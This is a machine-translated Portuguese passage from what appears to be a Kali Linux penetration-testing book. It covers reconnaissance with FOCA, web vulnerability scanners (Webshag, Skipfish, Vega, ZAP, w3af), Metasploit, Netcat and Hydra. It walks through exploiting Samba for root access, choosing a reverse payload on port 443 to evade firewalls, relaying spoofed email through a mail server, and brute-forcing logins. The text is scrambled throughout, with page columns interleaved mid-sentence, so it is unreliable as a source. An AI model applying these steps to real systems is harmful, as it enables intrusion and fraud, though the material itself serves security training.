anfitries uma Excel. como diz ao Nmap para digitalizar um combinao DVR via satlite / [65] quando e por quem foram recolhidas. anfitrio, mesmo sem uma resposta receptor. Os metadados podem ser teis para de ping. Embora isto faz [64] Reconhecimento testadores de penetrao, porque ele contm informaes sobre nas imagens seguintes:. Analisar Metadados opo, como se Reconhecimento normalmente o o sistema em que o arquivo foi criado, [67] mostra na passo mais crtico em um exerccio de tais como: a tela a seguir: Teste de Invaso Reconhecimento [70] e pode ser o mais demorado. Recomendamos manter todos os Quaisquer aes tomadas contra a arquivos do projeto em um nico Captulo 2 meta Nome de usurios logados no sistema lugar. Voc deveria Na tela seguinte, voc pode ver duas personalizado em torno de resultados Software que criou o documento criar uma nova pasta para cada pessoas abriram neste documento. de reconhecimento anteriormente OS do sistema que criou o documento projeto. Voc tambm pode determinar o realizadas. O mais FOCA uma ferramenta de 2. Uma vez que o nome do seu projeto Microsoft Office para o Mac e Adobe dados conhecidos sobre um alvo segurana e auditoria que ir e decidir onde voc deseja armazenar Photoshop foram equivale ao menos susceptveis de examinar os metadados de domnios. o projeto usado para criar este documento, desencadear alarmes, bem como Voc arquivos, clique no Criar boto, como como mostrado na imagem seguinte: melhor chance de identificar uma pode ter FOCA usar motores de busca mostrado na imagem seguinte: [71] maneira de comprometer o alvo. para encontrar arquivos em domnios [68] recomendado ou usar arquivos locais. Reconhecimento olhar para este captulo como um pr- FOCA construdo em Kali, no Captulo 2 Em muitos casos, os atacantes sero requisito para os captulos restantes entanto, a verso datado. A melhor 3. A prxima coisa a fazer salvar o capazes de ver muito mais deste livro. prtica baixar arquivo de projeto. Uma vez que voc informaes e reunir Neste captulo, ns nos concentramos a verso mais recente. FOCA tem sido salvou o projeto, clique em inteligncia sobre um alvo. em vrias maneiras de coletar tradicionalmente uma ferramenta do no Procurar Todos boto para FOCA FOCA permite ao usurio salvar e informaes sobre um alvo. Ns Windows, ea mais recente vai usar motores de busca para ndice de uma cpia de todos os apresentou algumas ferramentas verses podem estar disponvel procurar por metadados. Alm disso, gratuitas populares disponveis na apenas para Windows. documentos. Opcionalmente, voc cada tipo de arquivo de metadados Internet, bem como informaes A ltima verso do FOCA pode ser pode usar os documentos locais. podem ser salvas e copiado. Isto d Reunindo utilitrios disponveis em baixado em: http://www.informatica64. 4. Clique com o boto direito do um verificador da penetrao Kali Linux. Neste ponto, voc deve com.br / DownloadFOCA (Use o mouse no arquivo e selecione o Baixar uma riqueza de informaes. Imagens estar pronto para Google Translate para ver a pgina opo, como se mostra na so normalmente utilizados para dar avaliar alvos identificados por meio de em Ingls). tela a seguir: uma viso geral do reconhecimento para possvel Voc precisar dar o seu endereo de [69] arquivos indexados, juntamente com explorao. e-mail na parte inferior da tela. Voc uma lista de todos os arquivos O prximo captulo vai se concentrar ir Reconhecimento individuais. Finalmente, foca permitir em identificar e explorar receber um e-mail com o link de 5. Clique com o boto direito do uma vulnerabilidades em web download. Voc tambm vai receber mouse no arquivo e selecione o Tester Penetrao baixar arquivos aplicativos e servidores web. atualizaes quando FOCA Extrair Metadados opo, como se individuais que podem ser usados [72] tem novos lanamentos. mostra na como exemplos. 1. A primeira coisa a fazer depois de tela a seguir: Resumo Ataques do lado do servidor lanar FOCA criar um novo projeto, 6. Clique com o boto direito do Um servidor, por definio, um como mostrado mouse no arquivo e selecione o sistema de computao dedicada a execuo de servios para os gerenciar servidores remotamente e vetores. um servidor com um nomes de domnio hospedado em usurios e no monitorar ativamente a atividade, sistema operacional e executando uma mquina de destino, bem como outros computadores em uma rede. ou seja, pequenas batidas vrias peas de de difuso usando dinamicamente Exemplos de faixa de servio a partir em desempenho ou outros software para fornecer funcionalidade nomes de arquivos gerados. Webshag de servios pblicos, tais indicadores de que est sendo web. Ele tem muitas portas TCP pode realizar impresses digitais de jogos on-line como a partilha de comprometida pode passar abertas. Cada um de pginas da web ao mesmo tempo que arquivos confidenciais dentro de uma despercebida. esses vetores poderia colher uma resistente a alteraes de contedo. grande organizao. No contexto comum encontrar usurios mal- vulnerabilidade que um invasor pode Este recurso foi projetado como uma da arquitetura cliente-servidor, um intencionados j acessou servidores explorar para entrar remoo de falsos positivos servidores um programa de comprometidos por longos perodos o sistema e obter informao valiosa. algoritmo destinado a lidar com "soft computador que est executando para de tempo antes de os proprietrios Muitos protocolos em servidores so 404" respostas do servidor. servir que identificam a vulnerabilidade tratados Webshag acessado atravs de uma os pedidos de outros programas, usada para acessar o sistema. atravs de texto no criptografado interface grfica ou um console de conhecidos como os "clientes". Assim, Este captulo se concentrar na legvel. linha de comando e disponvel com o servidor executa identificao e explorao de Vamos dar uma olhada em algumas as plataformas Linux e Windows. alguma tarefa computacional em vulnerabilidades em web ferramentas disponveis no Kali para Webshag pode ser encontrado em nome de "clientes". Os clientes ou servidores de aplicativos. Vamos identificar vulnerabilidades Aplicaes Web executados no mesmo comear com apresentando em servidores. |Scanners de Vulnerabilidade Web computador ou ligue atravs da rede. ferramentas disponveis no Kali Webshag como webshag-gui. Por exemplo, um servidor que usados Webshag uma ferramenta multi- Webshag fcil de utilizar. Cada hospedar um jogo para identificar vulnerabilidades. Em threaded, multi-plataforma utilizada recurso tem uma aba na parte para o mundo enquanto os clientes seguida, vamos nos concentrar na para auditar servidores web. superior. Selecione o recurso poderiam acessar o jogo explorao de vulnerabilidades para Webshag rene funcionalidades desejado remotamente. Existem vrias formas ganhar geralmente teis para servidores web, guia, insira em seu URL de destino de prestao de servios aos clientes, acesso a servidores de aplicativos como o porto sob o espao de destino e clique em tais como um servidor Web Apache web. Concluiremos com outros digitalizao, digitalizao e arquivo Ok para executar. Voc HTTP ou limitada a um mtodos de acesso de URL difuso. Ele pode ser usado pode executar vrias abas Servidor de Aplicativos BEA WebLogic servios de aplicativos web. para fazer a varredura de um servidor simultaneamente. As caractersticas que faz HTTP e mais. web em incluem Porto de digitalizao, Servidores de rede so normalmente Ataques do lado do servidor HTTP ou HTTPS, atravs de um proxy Aranha, URL configurados para lidar com a carga A avaliao da vulnerabilidade e usando a autenticao HTTP Digitalizar e Fuzzing. Os prximos de atender grande Ataques do lado do servidor esto (bsica ou Digest). quatro imagens mostram Webshag volumes de clientes. Isso significa que explorando e encontrar Alm disso, Webshag pode usar realizando uma varredura de portas, a adio de processamento, memria vulnerabilidades em servios, portos, recursos de evaso de IDS que visam rastreamento de aranha web, adicional e e aplicaes rodando em um servidor. tornar correlao varredura URL e arquivo de Fuzz armazenamento tornando esses ativos Por exemplo, um servidor web tem entre os pedidos mais complicado. www.thesecurityblogger.com: valiosos alvos para hackers. vrios ataque Webshag oferece capacidades [74] Organizaes tipicamente inovadoras adicionais, tais como recuperar a lista de Captulo 3 [75] Skipfish pode ser encontrado em no ambiente de trabalho. Isto o processo. Voc pode terminar uma Aplicaes Web |Scanners de executado usando a palavra-chave varredura cedo digitando Ctrl +C. Ataques do lado do servidor Vulnerabilidade Web como skipfish,-O / root / Desktop / Uma vez que a verificao for [76] skipfish. Quando voc abre Skipfish, Skipfishoutput para especificar o local concluda ou se voc termin-la cedo, um Terminal janela pop-up mostrando para o qual enviar a sada, -W / root / Skipfish ir gerar uma tonelada de Captulo 3 comanda o Skipfish. Skipfish pode Desktop / complete.wl para especificar sada Webshag oferece exportar todos os usar dicionrios internos ou a localizao do dicionrio e http:// arquivos no local especificado quando dados encontrados durante uma personalizveis para www.thesecuirtyblogger.com como o se utiliza o -O opo de designar uma auditoria no XML, HTML e avaliao de vulnerabilidade. alvo para fazer a varredura contra. pasta de sada. Formatos de arquivo TXT. O relatrio Note-se que alguns dicionrios no [78] Para ver os resultados, clique no final da Webshag organizado em um pode ser encontrada em Kali. Voc index.html arquivo, o que far com formato lgico tornando-se pode Captulo 3 que uma Internet digno de ser usado como um baixar a ltima verso do Skipfish e Note-se que o padro skipfish navegador. Voc pode clicar nas documento independente ou artigo de padro dicionrios dicionrios no ser executado caixas drop-down para ver os referncia para um teste de a partir de quando se utiliza o resultados. Veja o penetrao https://code.google.com/p/skipfish/. -W comando. Voc pode copiar uma exemplo relata seo para obter mais relatrio de entrega. As duas prximas Os dicionrios disponveis esto lista de palavras padro e remover o informaes. imagens mostram exportadores localizados no dicionrio arquivo. read-only [80] opes e ao topo de uma Existem vrias opes de comando na primeira linha da lista (# ro) para relatrio de auditoria: disponveis em Skipfish. Para executar ser executado como uma lista de Captulo 3 Mais informaes sobre Webshag Skipfish contra um palavras personalizada. Isto ProxyStrike um proxy de aplicao pode ser encontrada em alvo site usando uma lista de palavras mostrado web construda para identificar as http://www.scrt.ch/en/attack/download personalizada, insira skipfish, na imagem seguinte: vulnerabilidades enquanto navega s/webshag. Selecione sua lista de palavras Se no houver erros de compilao, um aplicativo. Ele funciona como um [77] usando voc ser presenteado com uma tela proxy na porta de escuta 8008 por o -W opo seguida pela localizao de lanamento que padro, o que significa que Ataques do lado do servidor da lista de palavras, selecione o estados a digitalizao comear em tem que configurar o seu navegador Skipfish diretrio de sada 60 segundos ou ao pressionar de Internet para ser executado atravs Skipfish uma ferramenta de utilizao -O seguido do local, e, qualquer tecla. ProxyStrike para que ele possa reconhecimento de segurana de finalmente, o stio alvo. [79] analisar todos os parmetros em aplicativos web. Skipfish prepara um Skipfish-o (local de sada)-W segundo plano enquanto o surfe site mapa do site interativo para o alvo (localizao da lista de palavras) (site Ataques do lado do servidor do alvo. usando rastreamento recursivo e destino) Voc pode pressionar a Barra de As caractersticas de proxy so timos sondas base de dicionrio. O exemplo a seguir mostra uma espao para ver os detalhes sobre a para identificar, interceptar e modificar O mapa resultante fornece sada aps varredura usando uma lista de pesquisa ou ver os nmeros padro pedidos. ser escaneado por verificaes de palavras chamada complete.wl em executar. Digitalizar um alvo pode Para configurar um navegador de segurana. securityblogger.com. Skipfish ir criar levar de 30 segundos a algumas horas Internet, como o Firefox para usar uma pasta chamada Skipfishoutput para completar ProxyStrike, selecione em FireFox Preferncias |Avanado |Rede e http://, Verifique o rastreamento Vega [86] selecione Configuraes. Selecionar usando a caixa de plugins e clique no Vega uma ferramenta de teste de Proxy manual e grande Pare boto segurana utilizado para indexar um Captulo 3 digite o endereo IP do seu servidor mud-lo para Em execuo. site e analisar o contedo da pgina As duas imagens seguintes oferecer a de Kali seguido pelo porto de 8008 (A Adicionando os plugins ir aumentar o para possibilidade de adicionar os cookies menos que voc est pensando tempo para completar uma encontrar as ligaes, bem como e os padres de excluso para alterar a porta padro digitalizar. ProxyStrike exibir uma parmetros de formulrio. para evitar a difuso, que so ambos ProxyStrike). barra de status fornecendo uma Para iniciar Vega, ir para Aplicaes opcional. Voc pode deixar os ProxyStrike estimativa de quanto tempo uma Web |Scanners de Vulnerabilidade padres e clique em [81] varredura Web e selecione Prximo para ambas as telas. Clique deve tomar. Vega. Vega vai piscar um banner de em Acabamento para iniciar a Ataques do lado do servidor [82] introduo e exibir uma GUI. digitalizao. Para usar ProxyStrike, acesse [85] Vega vai exibir as pesquisar e mapear Aplicaes Web |Scanners de Captulo 3 as vulnerabilidades ativos encontrados Vulnerabilidade Web e [83] Ataques do lado do servidor para o nvel de risco selecionar ProxyStrike. Assumindo Vega tem Scanner e Procurao guias que representam para o sistema de que o seu navegador de Internet est Ataques do lado do servidor no canto superior direito. Para usar destino. enviando trfego para ProxyStrike, O Plugins guia mostra os resultados Vega como um scanner, A janela superior esquerda intitulado voc deve ver o trfego capturado no de um rastreamento aps uma clique no Scanner aba no canto Ver Website exibe o alvo (s) que est Comms guia. Vamos passar mais varredura lanado. Ataques superior direito, clique em sendo digitalizado tempo usando identificados podem ser exportados Digitalizao no canto superior e outros alvos associados com o alvo Proxies em Captulo 6, ataques web. via HTML ou XML. esquerdo, principal. A parte inferior da janela As caractersticas de esteira so uma O Log guia mostra quais as tarefas e selecione para comear a nova esquerda maneira fcil de digitalizar um site alvo que esto sendo executadas em site verificao. intitulado Digitalizar Alertas mostra as para SQL ou SSL e de destino eo nvel Voc ver um campo de entrada categorias de vulnerabilidades Vulnerabilidades XSS do plugin. Voc de sucesso para cada ataque. Este pedindo o alvo. O exemplo a seguir encontradas. Voc pode clicar no tem que ter ProxyStrike arquivo pode ser copiado para um alvo sobre os acentos circunflexos ao lado configurado como um proxy para arquivo de texto para um produto final. www.thesecurityblogger.com. Escolha dos alertas para ver o que usar os recursos de esteira. Para O Crawler guia lista todos os links da o seu destino e clique em Em seguida: vulnerabilidades Vega encontra. executar a funo de rastreador em web nicos identificados associados a As prximas sees so opes que Quando voc um site com plugins XSS, um alvo. voc pode avaliar o seu alvo contra. clicar em qualquer vulnerabilidade, clique no Plugins guia, v at as velas ProxyStrike oferece outros recursos Existem dois principais Vega apresenta uma definio do que de XSS e selecione para ativar os teis. Mais sobre ProxyStrike pode ser mdulos (injeo e Processamento encontrado com um plugins encontrada em Response) com muitas opes para explicao detalhada de seu possvel usando a caixa de seleo. Em http://www.edge- fazer a varredura contra. impacto. seguida, selecione a guia rastreador. security.com/proxystrike.php. Clique na pequena cenoura em cada [87] Entre no site da meta, incluindo [84] mdulo, selecione as opes que voc deseja procurar, Ataques do lado do servidor Captulo 3 e clique em Avanar. A figura a seguir mostra uma possvel que usam HTTPS. Para gerar um , indo para Editar, Preferncias, links associados com o alvo, bem vulnerabilidade de script cross-site em certificado SSL, clique no Gerar boto. selecionar o Avanado guia e, em como varredura em busca de www.thesecurityblogger.com: [89] seguida, selecionando o vulnerabilidades. Para ver o Vega do Procurao seo fornece a Rede guia. Clique no Configurar vulnerabilidades, clique no Alertas capacidade de ver os pedidos e Ataques do lado do servidor boto, clique em Configurao manual guia. respostas Haver uma janela que aparece de proxy, Note-se que Zaproxy no automatizar um site de destino. O Procurao pedindo para gerar ou importar um tipo localhost e porta 8080, Que o a autenticao por padro. Tudo o seo ser preenchida como ocorre certificado. Voc padro para Zaproxy. Clique no login uma varredura. pode gerar um certificado clicando em caixa ao lado Use este servidor proxy solicitaes falhar usando uma [88] Gerar. Voc pode salvar o novo para todos os protocolos e clique em varredura automtica se as certificado OK. O configuraes padro esto Captulo 3 clicando no Salvar e selecionar onde tela a seguir demonstra essa habilitados. Vega oferece detalhes sobre voc deseja coloc-lo. O novo arquivo configurao: [92] vulnerabilidades encontradas no visor de certificado Abra Zaproxy e voc deve ver uma central, bem chamado owasp_cap_root_ca.cer. Sites janela no lado superior Captulo 3 como uma pgina de resumo. Esses Uma vez que voc salvou o arquivo de esquerdo. Esta vontade Voc pode configurar o login detalhes podem ser copiados para um CA, clique em Ok e abrir o seu preencher como voc navegar na automtico usando Zaproxy, no resultado final. navegador. Para o Firefox, Internet usando o Firefox. Voc pode entanto, voc ter que primeiro OWASP-Zap falir Editar |Preferncias e clique no ver todos os pedidos e registrar manualmente em um site OWASP-Zap tambm conhecido como Avanar guia. Clique no Criptografia respostas para cada pgina na janela enquanto Zaproxy est habilitado, diga Zaproxy um proxy interceptar sub-aba e clique em Exibir da direita. Zaproxy d uma viso fcil Zaproxy onde o projetado para a segurana certificados. Em seguida clique em de todos login e logoff so pedidos e habilitar o testes de aplicaes web. Importao e selecione o certificado os recursos que esto sendo recurso de auto-login. O GET Abrir Zaproxy, indo para Aplicaes voc gerada em Zaproxy (o . Cer utilizados por cada pgina. solicitaes Web |Aplicaes Web fuzzers e arquivo). Firefox ir perguntar em [91] ser exibido na Sites janela e voc selecionando owasp-zap. Haver um quem confiar com o deve destacar tanto o login e de logout aviso pop-up que deve ser aceito para novo Autoridade de Certificao. Ataques do lado do servidor respostas sob a Respostas guia comear Confira todas as trs opes, que so Voc tambm pode fazer uma clicando com o boto direito sobre a o programa. sites de confiana, e-mail avaliao especfica de um site, indo resposta, ao clicar em Ao aceitar o aviso de licena, desenvolvedores de usurios, e para o incio rpido Assinalar como contedo e selecionar OWASP-Zap vai abrir e exibir outro software. Clique em Ok duas vezes. janela e digitando em um site na URL se a de login ou logout. pop- [90] para atacar espao. A sequncia Um cone com uma linha marrom perguntando se voc gostaria de criar Screenshot Zaproxy executar uma aparecer na barra de ferramentas um certificado SSL da CA raiz. Isto Captulo 3 verificao de representando automtico permite Zaproxy O prximo passo configurar o www.thesecurityblogger.com: autenticao. Clique sobre esse cone para interceptar o trfego HTTPS Firefox para procurao todo o trfego Zaproxy ir realizar um rastreamento para ativar a autenticao automtica sobre SSL em um navegador. Isto atravs Zaproxy. Faa isso de aranha do site da meta identificar de modo que importante para aplicaes de teste todas as Zaproxy pode logar automaticamente Tipo USO seguido do mdulo que ataques. considerada uma das msfgui (Baseado em GUI) e msfcli em qualquer pedido de autenticao voc deseja e preencha os requisitos ferramentas mais teis para (Linha base de comando). ao fazer uma para executar. testadores de penetrao. HD Moore Em adio aos comandos Metasploit, avaliao automtica de um alvo. Este Por exemplo, para executar o criado em 2003. Ele usado como msfconsole permitir que voc invocar recurso til para auto-explorar um Webkiller mdulo, tipo usar a rede / uma ferramenta de teste de comandos do sistema operacional site Webkiller e encher penetrao legtimo, bem como uma subjacente, como sibilo ou nmap. Isso que requer autenticao. no alvo para atacar o uso set TARGET ferramenta til porque [93] comandos. Tipo RUN para executar o utilizado por atacantes para realizar a permite a um invasor executar tarefas mdulo. explorao no autorizada de rotineiras sem sair do console. Ataques do lado do servidor [95] sistemas. Em nosso primeiro passo, vamos usar Zaproxy tem um lugar de mercado H uma abundncia de fontes nmap para fazer a varredura da rede encontrado em Ajudar |Verificar Ataques do lado do servidor dedicado a ensinar como usar o local. Os resultados podem atualizaes que oferece outra Explorao Metasploit ser automaticamente adicionado no caractersticas, que podem ser Se um verificador da penetrao quadro. No contexto deste livro, Metasploit usando um arquivo XML. adicionados ao arsenal Zaproxy. investe tempo e recursos adequada vamos examinar como Metasploit [96] Zaproxy oferece diferentes opes de durante o usado relatrios encontrados sob a Relatrio Reconhecimento de um alvo, o para a explorao do lado do servidor Captulo 3 guia. verificador da penetrao deve acabar para testar aplicaes web em O comando que emitimos : Aqui esto exemplos de um relatrio com uma lista de alvos potencial. my.xml rede nmap-n-oX HTML para com possveis vulnerabilidades. O Nota para certificar-se de Postgres Vamos importar os nossos resultados www.thesecurityblogger.com. prximo passo priorizar o valor de SQL e servios Metasploit so de nmap em Metasploit usando o [94] cada alvo para o seu iniciados. arquivo XML que criamos. misso, aproximando o nvel de Voc pode faz-lo digitando postgres Fazemos isso atravs do comando: Captulo 3 esforo necessrio para explorar servio comear e servio db_import my.xml Websploit possveis vulnerabilidades, incio Metasploit no Terminal janela Uma verificao rpida dos comandos Websploit um projeto de cdigo e julgar o risco associado com a como root. do host mostra que a nossa aberto usado para digitalizar e analisar realizao do ataque. A O primeiro passo abrir um console e importao bem sucedida e sistemas remotos vulnerabilidade e digitar msfconsole para lanar Metasploit tem agora a nmap dados. encontrar vulnerabilidades. explorao disponvel em Kali so Metsaploit. Ns tambm ir emitir o servios Para acessar Websploit, ir ao abrigo ideais para a identificao e msfconsole a forma mais popular comando para ver os servios Aplicaes Web |Aplicaes Web explorao de vulnerabilidades para lanar Metasploit. Ele fornece um disponveis dentro fuzzers e encontrados durante o usurio Metasploit. O seguinte um exemplo selecionar websploit. ATerminal janela reconhecimento de servidores de interface para acessar o quadro de sada do servio comando: pop-up com o Websploit bandeira. aplicativos web. Metasploit inteiro. Comandos bsicos, [97] Voc Metasploit como pode ver todos os mdulos O Metasploit quadro uma das ajudar e exposio permitir que voc Ataques do lado do servidor disponveis eo que necessrio para ferramentas mais populares para a navegue atravs Metasploit. Voc pode realizar a digitalizao para executar um mdulo especfico por explorao do lado do servidor Note-se que existem outros mtodos nmap e importar o arquivo XML para o datilografia Mostrar mdulos. para lanar Metasploit como Metasploit banco de dados em uma nica etapa Captulo 3 [100] Ataques do lado do servidor usando o comando db_nmap. No Para usar um especfico explorar, Quando terminar de configurar as exemplo a seguir, ns emitimos o usar comando. Neste Captulo 3 nossas opes, podemos escrever, est usando db_nmap para digitalizar caso: Uma vez que a carga definido, explorar para executar o ataque. um host usando o nmap comandos. Uma vez que um exploit podemos emitir o mostrar opes Quando Podemos verificar que Metasploit tem selecionado, preciso ver que comando novamente para verificar a o exploit executado com xito, voc a informao relevante na sua informao necessria antes de opes especficas para a carga til. ser conectado ao servidor remoto. emisso de banco de dados podemos executar o selecionado Podemos ver isso de carga especfico Voc pode o hospedeiros e servios comandos. explorar. Fazemos isso atravs da est nos pedindo para definir o executar qualquer comando e, neste O servios comando revela que identificao do requerido LHOST e a LPORT. O exemplo, neste particular explorar d estamos usando o compartilhamento opes listadas na sada e selecionar LHOST o host local ou sua caixa acesso root. Raiz de arquivos Samba. Vamos ver se uma carga til que queremos entregar. atacante Metasploit. A explorao faz acesso significa acesso completo ao podemos Ns o controle remoto seu servidor remoto alvo. procurar um exploit e tirar proveito emitir o comando mostrar opes para sediar ligar de volta para o sistema de Existem vrios exploram e carga disso. importante notar que, embora ver as opes necessrias: hospedagem Metasploit, por isso o opes disponveis no quadro estamos atacando um servidor web [99] host remoto precisa Metasploit. real, neste caso, no precisa sabe o que o seu endereo de IP . Certifique-se de rever as opes necessariamente tentar Ataques do lado do servidor Alm disso, preciso definir a porta disponveis no para explorar uma vulnerabilidade Podemos ver esse exemplo que do host remoto ir usar para se http://www.metasploit.com/. web. Atacantes reais vai aproveitar precisamos de uma RHOST entrada. comunicar com w3af todo o software RHOST o endereo IP Metasploit. Muitos ambientes w3af (Abreviao de Aplicaes Web rodando em um servidor web para do host remoto que esto atacando. corporativos restringir portas de sada Attack e Quadro de Auditoria) um acessar informaes. Ns tambm precisamos selecionar a atravs de um firewall open-source Vemos vrios exploits Samba carga e definir o ou roteador. A melhor prtica usar scanner de segurana de aplicaes disponvel. Eles tambm tm rankings. opes de carga til. A carga til o uma porta comum, como porta 443, web e ferramenta de explorao. W3af Usaremos cdigo que injeta em si e executa o Uma vez que geralmente pode ser acessado em o usermap_script explorar com uma exploit. Desde reservados para o trfego SSL, que a Avaliao de Aplicaes Web excelente classificao. Este mdulo a mesma vulnerabilidade pode existir maioria das empresas permitem |Scanners de Vulnerabilidade Web explora o usando vrios mtodos, podemos sada. Alm disso, outra seleccionando w3af. vulnerabilidade de execuo de eventualmente ter benefcio do uso de porta 443 que a [102] comando em verses de Samba vrias cargas teis para escolher. maioria das organizaes no 3.0.20 atravs 3.0.25rc3. Para ver as cargas disponveis, emita inspecionar SSL. Ns achamos que Captulo 3 Mais informaes sobre este exploit o exposio utilizao 443 como LPORT para a w3af oferece um assistente, no pode ser encontrada em payloads comando. maioria dos ataques nos permite entanto, no necessrio para http://www.metasploit.com/ Uma vez que vemos uma carga que ignorar ferramentas de proxy interno executar corretamente uma varredura. modules / exploit / multi / samba / queremos usar, o prximo passo um O primeiro usermap_script. usar a definir payload organizao pode ter implantado. passo ou est a criar um novo perfil ou [98] comando e colocar no nome do patch [101] aproveitando um perfil existente. Os da carga que vemos. perfis so utilizados para plugins de grupo que ser Para ver os resultados de uma enviar informaes confidenciais por host o servidor SMTP. A tela a executado em um alvo. w3af vem com varredura, clique no Resultados guia. e-mail. Na maioria dos ambientes, os seguir est sendo executado Feroz algum grande defeito Resultados proporcionar o servidores de e-mail manter em grupos como OWASP TOP10. foram identificados os detalhes do que informaes valiosas tornando-se um www.cloudcentrics.com: Definies de plugins existentes sero possvel vulnerabilidades. O Explorar alvo de alta prioridade para os Primeiro, precisamos ver se o servidor exibidas em guia vai mostrar atacantes. A boa de correio eletrnico vulnervel a A janela Centro de como voc as possveis exploits baseados nas notcia para os consumidores que os comandos diretos. A principal selecion-los, como o exemplo a vulnerabilidades descobertas. sistemas de e-mail configuradas finalidade para a qual a maioria dos seguir do OWASP [104] corretamente modernos so atacantes querem explorar servidores Perfil TOP10. Voc pode selecionar extremamente de correio para falsificar e-mails um perfil existente ou o novo perfil que Captulo 3 difcil de explorar. Isso no significa e utilizar o servidor de e-mail como um voc acabou de w3af permite aos usurios explorar que os sistemas de e-mail no so servidor de retransmisso de e-mail criado na coluna da esquerda. Se vulnerabilidades identificadas durante vulnerveis a ataques no autorizado. Este livro vai voc estiver usando um novo perfil ou a fase de auditoria. Como pois a maioria dos sistemas de e-mail cobrir mais sobre como comprometida editar um j existente vulnerabilidades so encontrados, tm aplicaes web e so acessadas e-mail servidores podem ser usados perfil, voc pode marcar a caixa para eles so armazenados em locais atravs de um web para a engenharia social qualquer plugins que deseja verificar. especficos da base de conhecimento, interface. Isto promove a possibilidade ataques em Captulo 4, os ataques do Quanto mais plugins a partir da qual explorar plugins de um intruso acesso remoto a um lado do cliente. voc verificar, quanto mais tempo a podem ler e usar essa informao ncleo Neste exemplo, usaremos Netcat digitalizao vai demorar. w3af ir para explorar o sistema que poderia ser aproveitado como a ferramenta para se conectar avis-lo de possveis atrasos vulnerabilidade. Se a explorao for como um ponto a outros sistemas ao servidor de correio. Netcat se voc verificar um grande grupo. bem sucedido, voc vai ter um shell internos. um servio de redes de computadores Clique em Comeo para executar a no sistema de destino. O [105] para leitura e gravao para verificao. imagem seguinte mostra www.ntew3af Conexes de rede Em seguida, digite a URL de destino explorando a dayShell vulnerabilidade Ataques do lado do servidor usando TCP ou UDP. Netcat no Target: campo e clique em Comeo em Antes de atingir os servidores de projetado para ser um dispositivo para executar a verificao. O www.thesecurityblogger.com. correio, importante saber o que os confivel "back-end", que seguinte imagem mostra criao de H um monte mais recursos teis no sistemas esto hospedando o pode ser usado diretamente ou w3af para escanear conjunto de ferramentas w3af. Voc servidores de correio. Se voc no facilmente conduzida por outros www.thesecurityblogger.com: pode aprender mais em tiver essa informao, voc pode usar programas e scripts. Netcat tambm [103] http://w3af.org/. o Reconhecimento uma depurao e investigao Explorando os sistemas de e-mail tcnicas que aprendemos em Captulo ferramenta de rede rica em recursos Ataques do lado do servidor Por natureza, todos os sistemas de e- 2, de reconhecimento. Neste exemplo, com a capacidade de produzir w3af mostrar o status de uma mail sentar na Internet e permitem foi utilizado quase qualquer tipo de correlao varredura ativa no Log janela. w3af externo annimo feroz para determinar os hosts MX usando um nmero de capacidades tentar acesso do mundo exterior, a fim de para um domnio particular. Na embutidas. predizer o perodo de tempo ser produtivo. Usurios em muitas maioria dos casos, o MX Um mtodo comum para lanar Netcat necessrio para completar a anlise. organizaes est emitindo o comando netcat correio-servidor port. Neste exemplo, o nosso alvo A lista completa dos comandos SMTP mtodo de ataque para testar contra e HTTPS GET e POST informaes. servidor de correio est em execuo podem ser encontrados atravs dos uma variedade de protocolos Esta informao til ao usar servidores pela porta 25. Ns comandos SMTP RFC diferentes. ideal para atacar ferramentas verificado esta informao usando ou usando o Google. sistemas de e-mail porque Hydra pode tais como Hydra fora-bruta nmap durante os passos de Ataques de fora bruta direcionar um IP e protocolo formulrios da web, pois voc pode reconhecimento descrito Um ataque de fora bruta quando especfico, como o administrador automatizar Hydra na abertura em Captulo 2, de reconhecimento. todas as chaves possveis so conta para POP3 e SMTP utilizado a pgina da Web e testar as diferentes Uma vez que se conectar ao servidor verificadas em relao aos dados pelos sistemas de e-mail. combinaes de nome de usurio e usando Netcat, usamos o HELO criptografados at Antes do lanamento de Hydra, voc senha. comando para informar o a chave correta seja encontrada. deve executar Reconnaissance em Uma vez que habilitar o plugin Tamper que servidor que somos. Ataques de fora bruta so um alvo, como um Data, podemos lanar o plugin e [106] extremamente caros a partir de um sistema de correio. Captulo 2, o inici-lo recurso e reconhecimento, cobre uma antes de apresentar um nome em um Captulo 3 perspectiva de tempo, porque o ferramenta de avaliao de formulrio web. Se recebermos uma resposta, atacante est explorando vulnerabilidades Zenmap [108] podemos manipular a maioria dos vulnerabilidades no criptografia que pode ser usado para coletar as servidores usando os comandos tirando proveito do comprimento da seguintes informaes para Hydra: Captulo 3 SMTP chave e simplicidade da chave. Uma Tamper Data ir exibir as informaes (Alguns sistemas podem no ser senha baseado frequentemente inseridas nos grupos de campo. Os vulnervel com base na configurao em palavras de dicionrio ou seja, o atacantes podem e tipo de sistema). No espao total de um invasor teria que manipular e reenviar os dados, seguinte exemplo, comear por dizer testar seria O endereo IP do alvo (por exemplo, mesmo que o site criptografado. ao servidor que estamos usando o todas as palavras em um dicionrio de 192.168.1.1) Neste exemplo, vemos que o nome de HELO comando. correspondncia fazendo o escopo Portas abertas (por exemplo, a porta usurio rosa ea senha pinkprincess Em seguida, podemos usar o servidor adivinhando significativamente menor 80 ou 25) so de email para retransmitir mensagens do que uma senha com caracteres Protocol (por exemplo, HTTP para utilizado quando o login boto foi para futuros ataques do lado do aleatrios. Melhores prticas para web ou SMTP para o correio) submetido. cliente. reduzir os ataques de fora bruta Nome de usurio (por exemplo, Ambos os exemplos so duas HELO,CORREIO DA,Para RCP, E est usando chaves longas e admin) maneiras prticas para a realizao de Dados so os nicos campos complicadas, bem como tempos de [107] reconhecimento em um alvo para obrigatrios. Voc pode usar outro espera aps um nmero de tentativas reunir as informaes teis Hydra ir campos para esconder que o e-mail e Ataques do lado do servidor precisar. H uma abundncia de est sendo enviado para e mudar a outros mtodos para adicionar mais Outra ferramenta de reconhecimento outros mtodos responder endereo. Uma fatores de segurana. que muitas vezes usado com Hydra e built-in ferramentas de Kali para exemplo mudando a Responder Hidra o plugin do Firefox coletar informaes na web para usar para tratar com o objetivo de enganar Hidra uma ferramenta desenvolvida Dados adulterao. em Hydra, no entanto, que um receptor em pela Escolha do Hacker (THC) que Tamper Data uma ferramenta escrita recomendar Netcat e Tamper Data enviando um e-mail para outra usa a fora bruta por Adam Judson que permite que um como os mtodos mais eficazes. pessoa. atacante para ver HTTP Agora que completamos nossa fase Voc pode ento executar Hydra. menos importante, voc deve digitar painel, acima Comece, um campo de reconhecimento, vamos lanar Voc ter de fornecer um arquivo que uma URL de destino, selecione o para a escolha do ponto de partida a Hydra e contm uma lista de nmero de threads (sugerimos vulnerabilidade ver como podemos usar nossa nomes de usurio e um arquivo que estourar o limite avaliao. Para iniciar o interior do / informao Reconnaissance para contm as senhas. isso a 